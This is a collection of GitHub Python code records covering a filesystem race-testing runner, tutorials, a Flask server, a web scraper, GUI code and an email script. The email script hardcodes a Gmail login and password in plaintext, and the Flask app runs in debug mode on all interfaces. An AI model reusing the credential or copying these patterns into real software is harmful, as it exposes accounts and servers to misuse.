open(emu.session_shm, 'rb') as f:\n f.seek(config.IVSHMEM_OFFSET_HEADER +\n config.IVSHMEM_OFFSET_RESERVED)\n\n length = struct.unpack('Q', f.read(8))[0]\n resmax = \\\n config.IVSHMEM_OFFSET_INSTANCES - \\\n config.IVSHMEM_OFFSET_RESERVED\n\n # seek to the correct ledger instance\n cursor = 0\n while cursor < min(length, resmax):\n l_seq, l_cnt, l_len = \\\n struct.unpack('QQQ', f.read(24))\n\n cursor += 24\n if l_seq != self.iseq:\n cursor += l_len\n continue\n\n # migrate the ledger\n with open(ledger_dst, 'wb') as b:\n b.write(struct.pack('QQ', l_cnt, l_len))\n b.write(f.read(l_len))\n\n cursor = -1\n break\n\n # if no ledger found, there is nothing we can do\n if cursor != -1:\n logging.error('unable to find ledger in memory')\n return None\n\n # do the very expensive validation\n runtime = VizRuntime()\n console = os.path.join(base, 'console')\n failure = False\n\n try:\n runtime.process(ledger_dst)\n except Exception as ex:\n failure = True\n with open(os.path.join(console + '-error'), 'w') as t:\n t.write(str(ex))\n t.write('\\n-------- EXCEPTION --------\\n')\n traceback.print_tb(sys.exc_info()[2], file=t)\n\n # save the console output\n with open(console, 'w') as t:\n t.write('\\n'.join(runtime.records))\n\n # save the races\n runtime.dump_races(console + '-racer')\n\n # return the runtime states\n return None if failure else runtime\n\n\nclass TestRunner(object):\n\n def __init__(self, fswork: FSWorker, sample: str, override: bool) -> None:\n # basic\n self.fswork = fswork\n self.sample = sample\n\n # prepare paths\n prepdn(config.TEST_RESULT_PATH, override=override)\n\n def run(\n self,\n cases: List[TestCase],\n repn: Optional[int] = None,\n fast: bool = False\n ) -> None:\n # initialize the shared stuff\n with attach_emulator() as emulator:\n # create an empty ivshmem file\n if os.path.exists(emulator.session_shm):\n os.unlink(emulator.session_shm)\n\n touch(emulator.session_shm, config.IVSHMEM_SIZE)\n\n # run the workers\n worker = TestExec(0, self.fswork, self.sample, fast)\n for case in cases:\n worker.run_rept(case, repn)\n\n\ndef main(argv: List[str]) -> int:\n # setup argument parser\n parser = ArgumentParser()\n\n # logging configs\n parser.add_argument(\n '-v', '--verbose', action='count', default=1,\n help='Verbosity level, can be specified multiple times, default to 1',\n )\n\n # override flag\n parser.add_argument(\n '-c', '--clean', action='store_true',\n help='Clean existing files',\n )\n\n # tag selection\n parser.add_argument(\n '-t', '--tag', default='000',\n help='Tag of the filesystem configuration (default to 000)',\n )\n\n # img selection\n parser.add_argument(\n '-i', '--img', default='empty',\n help='Filesystem image (default to empty)',\n )\n\n # test selection\n parser.add_argument(\n '-s', '--select', action='append', default=None,\n help='Test case selection'\n )\n\n # nrun mode\n parser.add_argument(\n '-n', '--num', type=int, default=None,\n help='Number of runs'\n )\n\n # fast mode\n parser.add_argument(\n '-f', '--fast', action='store_true',\n help='Fast mode (do not analyze on proper exit)'\n )\n\n subs = parser.add_subparsers(dest='cmd')\n subs.add_parser(\n 'test',\n help='Test execution',\n )\n\n # parse\n args = parser.parse_args(argv)\n\n # prepare logs\n enable_coloring_in_logging()\n logging.basicConfig(\n format='%(asctime)s %(levelname)s %(message)s',\n level=logging.WARNING - (logging.DEBUG - logging.NOTSET) * args.verbose\n )\n\n # prepare options\n cmd = args.cmd\n config.OPTION().action = '-'.join(['exec', cmd])\n\n # construct the filesystem instance\n fswork = None # type: Optional[FSWorker]\n\n fsname = config.OPTION().flavor\n if fsname == 'ext4':\n fswork = FSWorker_EXT4(FS_CONFIGS_EXT4[args.tag])\n\n elif fsname == 'btrfs':\n fswork = FSWorker_BTRFS(FS_CONFIGS_BTRFS[args.tag])\n\n elif fsname == 'xfs':\n fswork = FSWorker_XFS(FS_CONFIGS_XFS[args.tag])\n\n else:\n logging.error('Invalid filesystem: {}'.format(fsname))\n parser.print_help()\n return -1\n\n # filter test cases\n choices = set() # type: Set[TestCase]\n if args.select is None:\n choices.update(TEST_CASES)\n else:\n for pattern in args.select:\n matcher = re.compile(pattern)\n for case in TEST_CASES:\n if matcher.match(case.tid.name) is not None:\n choices.add(case)\n\n # sort the cases\n cases = sorted(choices, key=lambda i: i.tid)\n logging.info('Test cases selected: {}'.format(len(cases)))\n\n # choose action\n if cmd == 'test':\n runner = TestRunner(fswork, args.img, args.clean)\n runner.run(cases, args.num, args.fast)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"sslab-gatech/krace","sub_path":"script/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"37949958738","text":"##생성자정의\n##객체생성시, 무조건 자동으로 호출\n##생성자는 함수\n##이름이 정해져 있음:Dog__init__\n##2개 이상의 생성자를 정의xxx\n##생성자를 명시하지 않으면\n## 매개변수가 없는 하는일이 없는\n## 생성자를 자동으로 추가\n # __init__(self):\n # pass\n\n##생성자는 객체를 생성할때 자동으로 변수값을 할당을 원할때 사용\n\nimport sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nclass Service:\n secret=\"영구는 배꼽이 두개다\"\n def __init__(self,name):\n self.name=name\n\n def setname(self,name):\n self.name = name\n\n def sum(self,a,b):\n result= a+b\n print('%s님 %s +%s =%s입니다.:'%(self.name,a,b,result))\n\n\npey=Service('홍길동1')\n#pey.setname('홍길동2')\npey.sum(1,1)\n","repo_name":"jushik91/python-basic","sub_path":"7/book_177_3.py","file_name":"book_177_3.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35104441943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote Exploit.\n\nMain server file.\n\"\"\"\nimport builtins\nfrom io import FileIO\nimport logging\nimport os\nimport sys\nfrom types import FunctionType\nfrom typing import Any, TextIO\n\nimport colorama\nimport coloredlogs\nfrom flask import Flask\nimport verboselogs\n\nfrom .controllers.main import main\nfrom .controllers.list import list\nfrom .http.static import public, ui\n\ncolorama.init(autoreset=True)\n\ncoloredlogs.install(\n verboselogs.SPAM,\n fmt=colorama.Fore.MAGENTA\n + \"%(processName)s#%(threadName)s\"\n + colorama.Fore.CYAN\n + \" At %(pathname)s:%(lineno)d, in %(funcName)s\\n\"\n + colorama.Style.RESET_ALL\n + \"[ %(name)s ] %(asctime)s: %(levelname)s %(message)s\",\n)\n\n\ndef logging_print(\n *objects: Any,\n sep: str = \" \",\n end: str = \"\",\n file: TextIO = sys.stdout,\n flush: bool = False\n) -> None:\n \"\"\"\n A custom print function using logging.\n\n :param sep: Separator between objects, defaults to \" \"\n :type sep: str, optional\n :param end: End character, logging as default \\n, defaults to \"\"\n :type end: str, optional\n :param file: Another file to write output to, defaults to sys.stdout\n :type file: TextIO, optional\n :param flush: Wether to flush output file or not, defaults to False\n :type flush: bool, optional\n \"\"\"\n string: str = \"\"\n for index in range(len(objects) - 1):\n string += str(objects[index]) + sep\n string += str(objects[-1]) + end\n logging.info(string)\n if file is not sys.stdout:\n file.write(string)\n if flush:\n file.flush()\n\n\n_print: FunctionType = print\nbuiltins.print = lambda *args, **kwargs: logging_print(*args, **kwargs)\n\nprint(\"hey\")\n\nserver: Flask = Flask(__name__)\n\"\"\"The main Flask server.\"\"\"\n\nserver.template_folder = os.path.abspath(\"app/views\")\n\n# HTTP Static\nserver.add_url_rule(\"/public/\", view_func=public)\nserver.add_url_rule(\"/ui/\", view_func=ui)\n\nserver.add_url_rule(\"/list\", view_func=list)\n\nif __name__ == \"__main__\":\n server.run(host=\"0.0.0.0\", port=8080, debug=True)\n","repo_name":"Virinas-code/remote-exploit","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36509119510","text":"'''\n @FileName:MediaPipe.py\n @Author:yikai yang\n @Date:2023/2/13\n @Desc:Null\n'''\n\nimport mediapipe as mp\n\n\"\"\"\n This is mediapiepe model to detect hands\n \n :argument null\n :return null\n\"\"\"\n\n\nclass MediaPipe():\n def __init__(self):\n self.mp_hands = mp.solutions.hands\n self.hands = self.mp_hands.Hands(static_image_mode=False,\n max_num_hands=2,\n min_detection_confidence=0.05,\n min_tracking_confidence=0.2)\n","repo_name":"big97kai/FingerDetect","sub_path":"Functions/MediaPipe.py","file_name":"MediaPipe.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14567349117","text":"# import your necessary packages\nimport cv2\nimport imutils\nimport argparse\n\n# construct an argparser and parse your arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", default=\"car.jpeg\", help=\"Path to input image\")\nargs = vars(ap.parse_args())\n\n# load the image and display on it on the screen\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n# grab the spatial dimentions of the image\n(h, w) = image.shape[:2]\n\n# NB Mainiting Aspect Ratio and when resizing images\n\n# Let's resize our image to 150 pixels wide but in order to \n# prevent our image from being skewed/distorted, we must first\n# calculate the ratio of the new width to the old width\nr = 150.0 / w\ndim = (150, int(h * r))\n\n# perform the actual resize\nresize = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\ncv2.imshow(\"150w resized\", resize)\n\n# let's the resize the image with height 50pixels again keeping \n# the aspect ration\nr = 50.0 / h\ndim = (int(w * r), 50)\n\n# perform the actual resize\nresize = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\ncv2.imshow(\"50 resized\", resize)\ncv2.waitKey(0)\n\n# resizing with imutils\nresize = imutils.resize(image=image, width=100)\ncv2.imshow(\"imutils\", resize)\ncv2.waitKey(0)\n\n# construct a list of interpolation methods in OPENCV\nmethods = [\n (\"cv2.INTER_AREA\", cv2.INTER_AREA),\n (\"cv2.INTER_LINEAR\", cv2.INTER_LINEAR),\n (\"cv2.INTER_NEAREST\", cv2.INTER_NEAREST),\n (\"cv2.INTER_CUBIC\", cv2.INTER_CUBIC),\n (\"cv2.INTER_LANCZOS4\", cv2.INTER_LANCZOS4)\n]\n\n# loop over the interpolation methods\nfor (name, method) in methods:\n # resize the width of the image 3x with the current interpolation method\n print(f\"[INFO] {name}\")\n \n resize = imutils.resize(image=image, width=w * 3, inter=method)\n \n cv2.imshow(f\"{name}\", resize)\n cv2.waitKey(0)","repo_name":"bis29abena/Image-Processing","sub_path":"Opencv/resizing/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39032097404","text":"\"\"\"\nDesign a stack that supports push, pop, top, and retrieving the minimum element in constant time.\n\npush(x) -- Push element x onto stack.\npop() -- Removes the element on top of the stack.\ntop() -- Get the top element.\ngetMin() -- Retrieve the minimum element in the stack.\nExample:\nMinStack minStack = new MinStack();\nminStack.push(-2);\nminStack.push(0);\nminStack.push(-3);\nminStack.getMin(); --> Returns -3.\nminStack.pop();\nminStack.top(); --> Returns 0.\nminStack.getMin(); --> Returns -2.\n\n\nyoutube: https://www.youtube.com/watch?v=nGwn8_-6e7w\n\n\"\"\"\nclass MinStack(object):\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self._items = []\n \n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: None\n \"\"\"\n current_min = self.getMin()\n print('current_min:', current_min)\n if current_min is None or x < current_min:\n current_min = x\n self._items.append((x,current_min)) \n \n\n def pop(self):\n \"\"\"\n :rtype: None\n \"\"\"\n self._items.pop()\n \n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self._items)==0:\n return None\n else:\n return self._items[-1][0]\n \n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self._items)==0:\n return None\n else:\n return self._items[-1][1]\n\n \nobj=MinStack()\nobj.push(-10)\nobj.push(14)\nprint(obj.getMin())\nprint(obj.getMin())\nobj.push(-20)\nprint(obj.getMin())\nprint(obj.getMin())\nobj.top()\nprint(obj.getMin())\nobj.pop()\nobj.push(10)\nobj.push(-7)\nprint(obj.getMin())\nobj.push(-7)\nobj.pop()\nobj.top()\nprint(obj.getMin())\nobj.pop()","repo_name":"SanazME/Algorithm-DataStructure","sub_path":"array_stack_queues/Min_stack.py","file_name":"Min_stack.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2564577016","text":"import PySide6.QtWidgets as qtw\nfrom PySide6.QtCore import Qt as qt\n\nfrom src.widgets.QDialog.QDialog import Dialog\n\nfrom src.profileManager import ProfileManager\nfrom src.constant_vars import PROFILES_JSON\n\nclass SelectProfile(Dialog):\n\n profile: str = None\n\n def __init__(self, profilePath: str = PROFILES_JSON) -> None:\n super().__init__()\n\n self.setWindowTitle('Profile to copy mod(s) to:')\n\n layout = qtw.QVBoxLayout()\n\n self.profileList = qtw.QListWidget(self)\n self.profileList.setHorizontalScrollBarPolicy(qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.profileList.setFocusPolicy(qt.FocusPolicy.NoFocus)\n self.profileList.setSelectionMode(qtw.QListWidget.SelectionMode.SingleSelection)\n\n self.searchBar = qtw.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textChanged.connect(lambda x: self.search(x))\n\n profileManager = ProfileManager(profilePath)\n\n buttons = qtw.QDialogButtonBox.StandardButton.Ok | qtw.QDialogButtonBox.StandardButton.Cancel\n\n self.buttonBox = qtw.QDialogButtonBox(buttons)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.profileList.addItems(list(profileManager.getJSON().keys()))\n\n for widget in (self.searchBar, self.profileList, self.buttonBox):\n layout.addWidget(widget)\n \n self.setLayout(layout)\n \n def search(self, input: str) -> None:\n\n results = self.profileList.findItems(f'{input}*', qt.MatchFlag.MatchWildcard | qt.MatchFlag.MatchExactly)\n\n for i in range(0, self.profileList.count() + 1):\n\n item = self.profileList.item(i)\n\n if item not in results:\n self.profileList.setRowHidden(i, True)\n else:\n self.profileList.setRowHidden(i, False)\n \n def accept(self) -> None:\n\n self.setResult(1)\n\n try:\n self.profile = self.profileList.selectedItems()[0].text()\n except IndexError:\n pass\n\n return super().accept()\n \n def reject(self) -> None:\n self.setResult(0)\n return super().reject()\n","repo_name":"Wolfmyths/Myth-Mod-Manager","sub_path":"src/widgets/QDialog/profileSelectionQDialog.py","file_name":"profileSelectionQDialog.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"2775567164","text":"import datetime\nimport json\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\n\n\ndef process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,edit_back_page,stop_scan,debug,stop_flag,redirect):\n global back_page_index,back_page\n debug.d_print(\"Identifying the website\")\n \n if \"hinta.fi\" in website:\n debug.d_print(\"Hinta.fi identified\")\n entry, entry_xl, items_amount_old, columns = hinta_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug)\n elif \"hintaopas.fi\":\n debug.d_print(\"Hintaopas.fi identified\")\n entry, entry_xl, items_amount_old, columns = hintaopas_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug)\n if redirect == False:\n edit_back_page(website)\n \n return entry, entry_xl, items_amount_old, columns\n\ndef hinta_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug):\n\n items_amount = 0\n entry_xl = []\n soup = BeautifulSoup(content, 'html.parser')\n script_tags = soup.find_all('script', type='application/ld+json')\n\n if \"hinta.fi/g\" in website:\n debug.d_print(\"Scanning category list (/g)\")\n\n total_items_element = soup.find('span', class_='hv-text-strong')\n if total_items_element:\n total_items = int(total_items_element.text.replace(',', '.').replace(' ', ''))\n else:\n total_items = 15 # Failback\n debug.d_print(f\"The amount of expected elements is {total_items_element}\")\n\n items_amount = 0\n actual_items_amount = 0\n page_number = 1\n scan = True\n\n while scan:\n try:\n\n if stop_scan():\n scan = False\n debug.d_print(\"Received stop_scan, perfoming last scan\")\n skipped_items = 0\n if items_amount == total_items:\n debug.d_print(f\"Exiting job in total_amount({items_amount} == {total_items})\")\n items_amount = actual_items_amount\n break\n if stop_flag:\n if page_number == stop_flag+1:\n debug.d_print(f\"Exiting job on stop_flag({page_number} == {stop_flag+1})\")\n progress_callback(total_items,total_items)\n items_amount = actual_items_amount\n break \n debug.d_print(f\"Trying to get page {page_number}: {website}?l=1&p={page_number}\",\"-->\",True)\n response = requests.get(f\"{website}?l=1&p={page_number}\", timeout=5)\n debug.d_print(f\"Got response {response.status_code}\",\"\\n\",False)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, 'html.parser')\n product_rows = soup.find_all('tr', class_='hvjs-product-row')\n\n for row in product_rows:\n product_name_tag = row.find('strong', class_='hv--name')\n product_name = product_name_tag.get_text() if product_name_tag else \"Unknown Product\"\n link_tag = row.find('a', href=True)\n category_link = link_tag['href'] if link_tag else \"Unknown Link\"\n price_tag = row.find('td', class_='hv--price')\n price = price_tag.a.get_text() if price_tag else \"Unknown Price\"\n\n currency = price[-1] if not price[-1].isdigit() else \"Unknown Currency\"\n price = price.replace(',', '.').replace(' ', '')[:-1] if currency != \"Unknown Currency\" else price\n\n if (f\"'https://hinta.fi{category_link}'\") in str(entry_xl):\n skipped_items += 1\n else:\n entry_xl.append((product_name, price, currency, f\"https://hinta.fi{category_link}\"))\n actual_items_amount += 1\n items_amount += 1\n if stop_flag:\n progress_callback(page_number,stop_flag)\n else:\n progress_callback(items_amount,total_items)\n if skipped_items != 0:\n debug.warning_print(f\"Just skipped {skipped_items} items\",\"W\")\n debug.d_print(f\"Progress - > {items_amount}(actual {actual_items_amount}) out of {total_items}\")\n \n page_number += 1\n\n except requests.RequestException:\n debug.warning_print(\"Failed to fetch content after 5 seconds of trying\",\"E\")\n break\n\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n items_amount_old = items_amount\n columns = (\"Item\", \"Price\", \"Currency\", \"Link\")\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'https://hinta\\.fi/\\d+/.*', website):\n debug.d_print(\"Scanning product list (\\d+/.*)\")\n progress_callback(0,1)\n\n for script in script_tags:\n try:\n product_data = json.loads(script.string)\n if \"@type\" in product_data and product_data[\"@type\"] == \"Product\":\n product_name = product_data[\"name\"] if \"name\" in product_data else \"Unknown Product\"\n \n if \"offers\" in product_data:\n if \"@type\" in product_data[\"offers\"] and product_data[\"offers\"][\"@type\"] == \"AggregateOffer\":\n offers = product_data[\"offers\"].get(\"offers\", [])\n else:\n offers = [product_data[\"offers\"]]\n for offer in offers:\n offer_name = offer.get(\"name\", \"Unknown Offer\")\n price = offer.get(\"price\", \"Unknown Price\")\n currency = offer.get(\"priceCurrency\", \"EUR\")\n seller_name = offer.get(\"seller\", {}).get(\"name\", \"Unknown Seller\")\n\n entry = f\"Item: {product_name} Offer: {offer_name} Price: {price} {currency} Seller: {seller_name}\"\n entry_xl.append((offer_name, seller_name , price, currency))\n items_amount += 1\n except json.JSONDecodeError as e:\n debug.warning_print(\"JSON Decode Error:\",\"W\")\n debug.warning_print(f\"{e}\",\"E\")\n pass # Skip this script if it's not valid JSON\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n items_amount_old = items_amount\n columns = (\"Item\",\"Seller\",\"Price\",\"Currency\",\"Link\")\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n elif \"hinta.fi\" in website:\n progress_callback(0,1)\n debug.d_print(\"Scanning main page\")\n category_links = soup.find_all('a', class_='hv-menu-i-a')\n entry_xl = []\n\n for link in category_links:\n category_name = link.text\n category_link = link['href']\n \n # Check if the link contains unwanted patterns, skip if it does\n if \"hv-store-logo-w\" in link.parent.attrs.get(\"class\", []) or \"kauppaan.php\" in category_link:\n continue\n \n # Replace spaces with an underscore\n category_name_fixed = \" \".join(category_name.split())\n \n entry_xl.append((category_name_fixed, \"https://hinta.fi\" + category_link))\n items_amount += 1\n\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n \n items_amount_old = items_amount\n items_amount = len(entry_xl)\n columns = (\"Category\", \"Link\")\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n\ndef hintaopas_process_website_content(website, content, items_amount_old, website_content_listbox, progress_callback, stop_flag, stop_scan, debug):\n items_amount = 0\n entry_xl = []\n soup = BeautifulSoup(content, 'html.parser')\n script_tags = soup.find_all('script', type='application/ld+json')\n \n if re.match(r'^https://hintaopas\\.fi/product\\.php\\?p=\\d+$',website):\n debug.d_print(\"Scanning product list\")\n progress_callback(0,1)\n anchor_tags = soup.find_all('a', class_='ExternalLink-sc-1ap2oa8-2')\n for tag in anchor_tags:\n try:\n store = tag.find('span', class_='StoreInfoTitle-sc-bc2k22-1').text.strip()\n item = tag.find('span', class_='StyledProductName-sc-1v7pabx-2').text.strip()\n price = tag.find('h4', class_='PriceLabel-sc-lboeq9-0').text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = tag['href']\n rating_container = tag.find('div', class_='RatingContainer-sc-u1xymf-0')\n rating = rating_container['data-rating'] if rating_container else 'N/A'\n entry_xl.append((store,rating,item,price,link))\n items_amount += 1\n except:\n pass\n items_amount_old = items_amount\n columns = (\"Store\",\"Store's Rating\",\"Item\", \"Price\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'^https://hintaopas\\.fi/c/[^?]+\\?brand=\\d+$', website):\n debug.d_print(\"Scanning brand list\")\n debug.d_print(\"Trying to get data using the the first way\")\n progress_callback(0,1)\n table_rows = soup.find_all('tr', class_='Tr-sc-1stvbsu-2 chMRiA')\n for row in table_rows:\n product_link = row.find('a', class_='InternalLink-sc-1ap2oa8-1')\n item = product_link.find('h3', class_='ProductNameTable-sc-1stvbsu-3').text.strip()\n price_element = row.find('span', class_='PriceLabel-sc-lboeq9-0')\n price = price_element.text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = product_link['href']\n entry_xl.append((item,price, \"https://hintaopas.fi\" + link))\n items_amount += 1\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the first scan, perfoming product scan instead\",\"W\")\n list_items = soup.find_all('li', attrs={'data-test': 'ProductGridCard'})\n for item in list_items:\n try:\n product_link = item.find('a', class_='InternalLink-sc-1ap2oa8-1')\n name = product_link.find('span', class_='Text--j47ncs khWbVp titlesmalltext').text.strip()\n price_element = item.find('span', class_='Text--j47ncs iolWON')\n price = price_element.text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = product_link['href']\n entry_xl.append((name,price, \"https://hintaopas.fi\" + link))\n items_amount += 1\n except:\n pass\n\n items_amount_old = items_amount\n columns = (\"Item\", \"Price\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'https://hintaopas\\.fi/c/.*', website):\n debug.d_print(\"Scanning category list\")\n progress_callback(0,1)\n entry_data = soup.find_all('li', style='flex:0 0 110px')\n\n for data in entry_data:\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n name_element = data.find('span', class_='Text--j47ncs gEcihA titlesmalltext')\n if link_element and name_element:\n item = name_element.text.strip()\n link = link_element['href']\n entry_xl.append((item,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = (\"Category\",\"Link\")\n\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the first scan, perfoming item scan instead\",\"W\")\n entry_data = soup.find_all('tr', class_='Tr-sc-1stvbsu-2 chMRiA')\n for data in entry_data:\n item = data.find('h3', class_='ProductNameTable-sc-1stvbsu-3').text.strip()\n price_element = data.find('span', class_='PriceLabel-sc-lboeq9-0')\n price = price_element.text.strip() if price_element else \"\"\n price = float(re.sub(\"[^0-9,]\", \"\", price).replace(',', '.'))\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n link = link_element['href'] if link_element else \"\"\n entry_xl.append((item,price,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = list(columns)\n columns.clear()\n columns = (\"Category\",\"Price\",\"Link\")\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the second scan, perfoming another item scan\",\"W\")\n entry_data = soup.find_all('li', class_='OffersGridItem-sc-812954-1 kNYiDB')\n for data in entry_data:\n item = data.find('span', class_='Text--j47ncs khWbVp titlesmalltext').text.strip()\n price_element = data.find('span', class_='Text--j47ncs iolWON')\n price = price_element.text.strip() if price_element else \"\"\n price = float(re.sub(\"[^0-9,]\", \"\", price).replace(',', '.'))\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n link = link_element['href'] if link_element else \"\"\n entry_xl.append((item,price,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = list(columns)\n columns.clear()\n columns = (\"Category\",\"Price\",\"Link\")\n items_amount_old = items_amount\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(0,1)\n return entry, entry_xl, items_amount_old, columns\n\n elif \"hintaopas.fi\" in website:\n debug.d_print(\"Scanning main page\")\n progress_callback(0,1)\n list_items = soup.find_all('li', class_='SubLevelItem-sc-1niqwua-6 cLkuDP')\n for item in list_items:\n name = item.a.text\n link = item.a['href']\n entry_xl.append((name, \"https://hintaopas.fi\" + link))\n items_amount += 1\n \n items_amount_old = items_amount\n columns =(\"Category\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n","repo_name":"D3SXX/website-checker","sub_path":"website_processing.py","file_name":"website_processing.py","file_ext":"py","file_size_in_byte":15838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29606754272","text":"#!/usr/bin/python\n \n# Import smtplib for the actual sending function\nimport smtplib\n \n# For guessing MIME type\nimport mimetypes\n \n# Import the email modules we'll need\nimport email\nimport email.mime.application\n \n#Import sys to deal with command line arguments\nimport sys\n \n# Create a text/plain message\nmsg = email.mime.Multipart.MIMEMultipart()\nmsg['Subject'] = sys.argv[1]\nmsg['From'] = 'triomproductions@gmail.com'\nmsg['To'] = 'triomproductions@gmail.com'\n \n# The main body is just another attachment\n\nbody = email.mime.Text.MIMEText(sys.argv[2])\nmsg.attach(body)\n \n# PDF attachment block code\n\nadd_attachment = 1;\nif (len(sys.argv) < 4):\n\tadd_attachment = 0;\n\nif (add_attachment == 1):\n\tdirectory=sys.argv[2]\n\t \n\t# Split de directory into fields separated by / to substract filename\n\t \n\tspl_dir=directory.split('/')\n\t \n\t# We attach the name of the file to filename by taking the last\n\t# position of the fragmented string, which is, indeed, the name\n\t# of the file we've selected\n\t \n\tfilename=spl_dir[len(spl_dir)-1]\n\t \n\t# We'll do the same but this time to extract the file format (pdf, epub, docx...)\n\t \n\tspl_type=directory.split('.')\n\t \n\ttype=spl_type[len(spl_type)-1]\n\t \n\tfp=open(directory,'rb')\n\tatt = email.mime.application.MIMEApplication(fp.read(),_subtype=type)\n\tfp.close()\n\tatt.add_header('Content-Disposition','attachment',filename=filename)\n\tmsg.attach(att)\n \n# send via Gmail server\n# NOTE: my ISP, Centurylink, seems to be automatically rewriting\n# port 25 packets to be port 587 and it is trashing port 587 packets.\n# So, I use the default port 25, but I authenticate.\ns = smtplib.SMTP('smtp.gmail.com:587')\ns.starttls()\ns.login('triomproductions@gmail.com','pi@1335e')\ns.sendmail('triomproductions@gmail.com',msg['To'], msg.as_string())\ns.quit()","repo_name":"eedmond/FooBartender","sub_path":"Utilities/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44161225233","text":"import os\nimport re\nimport collections\nimport argparse\nfrom collections import Counter\nfrom typing import Dict, Tuple, List, Any\n\nRENAME_PATTERN = r'(.*)\\s*(S\\d{2}E\\d{2}).*(\\..*)'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Rename series files. Useful for services like Plex.')\n parser.add_argument('path', type=str, help='path to directory with files')\n parser.add_argument('-i', '--info', help=\"do not make changes, just show rename suggestions\", action=\"store_true\")\n args = parser.parse_args()\n return args\n\n\ndef create_suggestions(file_names: List[str]) -> Tuple[List[str], Dict[str, str]]:\n prefix_counter: Counter[str] = collections.Counter()\n suggestions: Dict[str, str] = dict()\n\n print('Looking for files in a directory...')\n for filename in sorted(file_names):\n match = re.search(RENAME_PATTERN, filename, flags=re.IGNORECASE)\n if match:\n series_name = 